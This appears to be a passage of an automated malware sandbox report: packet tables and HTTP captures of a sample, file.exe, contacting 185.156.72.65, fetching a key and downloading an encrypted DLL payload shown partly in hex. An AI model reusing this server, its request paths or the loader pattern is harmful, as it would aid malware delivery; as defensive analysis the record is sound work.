Nov 29, 2024 19:50:38.964715004 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.964720011 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.964728117 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.964739084 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.964741945 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.964751959 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.964776039 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.964806080 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.965421915 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.965471029 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.965534925 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.965564013 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.965574980 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.965607882 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.965617895 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.965620995 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.965631008 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.965667963 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.966095924 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.966147900 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.966192007 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.966394901 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.966407061 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.966435909 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.966458082 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.966919899 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.967053890 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.967096090 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.967832088 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.967932940 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.967972040 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.968733072 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.968770981 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.968772888 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.968807936 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.969540119 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.969647884 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.969688892 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.970379114 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.970422983 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.970496893 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.971215963 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.971330881 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.971437931 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.971447945 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.971487045 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.972153902 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.972203970 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.972280025 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.972337961 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.973059893 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.973105907 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.973189116 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.973253012 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.973881006 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.973912954 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.973927021 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.973957062 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.071852922 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.071971893 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.072030067 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.072240114 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.072280884 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.072334051 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.072375059 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.073267937 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.073321104 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.073338032 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.074012995 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.074064970 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.074311018 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.074354887 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.074388027 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.074429989 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.075177908 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.075227022 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.075341940 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.075439930 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.076023102 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.076073885 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.076127052 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.076170921 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.076879978 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.076926947 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.077086926 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.077133894 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.077761889 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.077773094 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.077811003 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.078701019 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.078742027 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.078795910 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.078883886 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.079480886 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.079529047 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.079567909 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.079607964 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.080343008 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.080385923 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.080440044 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.080477953 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.081219912 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.081264973 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.081340075 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.082086086 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.082144022 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.082153082 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.082194090 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.083345890 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.083399057 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.083420992 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.083467007 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.083827019 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.083880901 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.083936930 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.083981991 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.084681988 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.084738970 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.084803104 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.084844112 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.085613966 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.085747957 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.085758924 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.085800886 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.086452007 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.086464882 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.086497068 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.087470055 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.087516069 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.087541103 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.087580919 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.088165998 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.088213921 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.088262081 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.088372946 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.089054108 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.089107037 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.089176893 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.089265108 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.089936018 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.089978933 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.090051889 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.090131998 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.090837955 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.090903997 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.090930939 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.090941906 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.173779964 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.173800945 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.173914909 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.174036026 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.174047947 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.174086094 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.174731016 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.174787045 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.174813986 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.174839020 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.175467014 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.175515890 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.175575972 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.175620079 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.176836014 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.176882982 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.176903963 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.176945925 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.181387901 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.181458950 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.181533098 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.181545973 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.181564093 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.181590080 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.181617022 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.181811094 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.181823969 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.181869984 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.181916952 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.181929111 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.181967020 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.182442904 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.182459116 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.182496071 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.182518005 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:39.182576895 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.182589054 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:39.182630062 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:42.170476913 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:42.170532942 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:51:07.984249115 CET	49700	80	192.168.2.7	185.156.72.65

HTTP Request Dependency Graph

185.156.72.65

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	185.156.72.65	80	7312	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 19:50:01.598325014 CET	416	OUT	GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:03.108819008 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:02 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:03.125473976 CET	388	OUT	GET /dll/key HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:03.677336931 CET	224	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 21 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73 Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
Nov 29, 2024 19:50:03.682116985 CET	393	OUT	GET /dll/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:04.412584066 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Length: 97296 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED] Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEPOuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~\|jbK!N7R}T2bsq1L^!\|qD'sLnD@bn%0=bQ1+lQXO\|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
Nov 29, 2024 19:50:04.412621021 CET	1236	IN	Data Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU\|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
Nov 29, 2024 19:50:04.412632942 CET	1236	IN	Data Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd Data Ascii: Dp!lR7+2J^'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: rUz(-dFI?[VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
Nov 29, 2024 19:50:04.412823915 CET	1236	IN	Data Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4 Data Ascii: BGpwCy6$h$xZ\|YQ\|5#n&!w@Duhs:\|BFGc3_^MH_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
Nov 29, 2024 19:50:04.412838936 CET	1236	IN	Data Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
Nov 29, 2024 19:50:04.412846088 CET	1236	IN	Data Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7 Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
Nov 29, 2024 19:50:04.412856102 CET	776	IN	Data Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0 Data Ascii: +y@qE6a_]p{@v8/\|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
Nov 29, 2024 19:50:04.412868023 CET	1236	IN	Data Raw: 51 8c 48 de 53 42 b3 9f 80 87 2d 00 76 d3 fc 30 3c 83 c1 20 e0 19 63 5c 90 b2 04 84 74 4d ee b0 63 ca e0 5b 54 34 e0 b0 f7 41 75 d5 78 78 63 0d a0 9e 2a 2b f7 eb a9 e9 0b 68 09 4d fb eb 1e bd b6 67 1b d2 43 5d 60 b9 3d 6f ab 38 4d 7d 6b a9 2b 07 Data Ascii: QHSB-v0< c\tMc[T4Auxxc*+hMgC]`=o8M}k+B[5Nx62G(%OrKv5H0Uq`42p0;U&lV)h,t7jUHroBA#- Rvc+xuT$yQ;)D<1:XRE^7ipg/
Nov 29, 2024 19:50:04.413089991 CET	1236	IN	Data Raw: 1c d9 36 dc 92 56 13 9a 51 8a a2 a9 0e fc 39 5f 6e 2d b9 8d e0 d2 d3 5c 6a 73 c6 14 6b 12 37 fc bf d4 72 b5 69 16 1b 78 a8 61 23 1d bc 76 79 fe dd 91 43 5c 3c bd c9 13 b3 37 77 e7 cd 06 ea 13 c0 0f 04 ec 03 ed 73 bc 35 aa 38 c2 33 99 76 c7 02 3d Data Ascii: 6VQ9_n-\jsk7rixa#vyC\<7ws583v=w,"Zf`>]6%""4Y8}p+[aM}<Q8,R\;(!y7\|@s(gYK&&nB<H3Qh-`
Nov 29, 2024 19:50:04.421199083 CET	1236	IN	Data Raw: ef 68 0f 83 0f f0 5b 39 d3 77 ad 42 87 cf 4e b4 0d bb fa 83 0c 3a ef c1 8d 12 d6 44 1e 47 2a 54 02 3b 5e 57 62 0d 49 59 7a ac 9e 07 46 c7 d1 73 3d 66 c2 12 95 81 9f d8 97 75 8e c2 f3 f1 0c 05 1d 0a 2e 94 1b f8 94 69 74 00 f7 75 20 0a a5 a0 43 7b Data Ascii: h[9wBN:DGT;^WbIYzFs=fu.itu C{`94gkda6U#VoTT<{TIgB)v\+ \3By=~Q2}H}izsGv>sH4w3gWM\|E j;
Nov 29, 2024 19:50:04.421257973 CET	1236	IN	Data Raw: d8 e7 cd 7a b9 3d 65 1d e3 53 4f ba c4 27 67 75 c2 8a 09 90 d7 29 ff 9b a4 c5 23 eb 3d 0f 7e 44 08 72 16 c5 97 00 82 bd 3f 5f fe 45 6b 78 d3 20 e8 97 e7 c3 79 43 ee d8 53 3c da ff e2 30 1a 6b df 7b 29 c3 d8 ce 51 74 dc dd eb 44 b2 90 75 04 b3 08 Data Ascii: z=eSO'gu)#=~Dr?_Ekx yCS<0k{)QtDuuM5:1hJ5A\*3x>olqm%o85$<(+#.Rk6FUbw[bbK[FV%#33<ilf.JiN<T=
Nov 29, 2024 19:50:04.941490889 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
Nov 29, 2024 19:50:05.501900911 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 18:50:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 29, 2024 19:50:07.529673100 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.72.65 Connection: Keep-Alive Cache-Control: no-cache
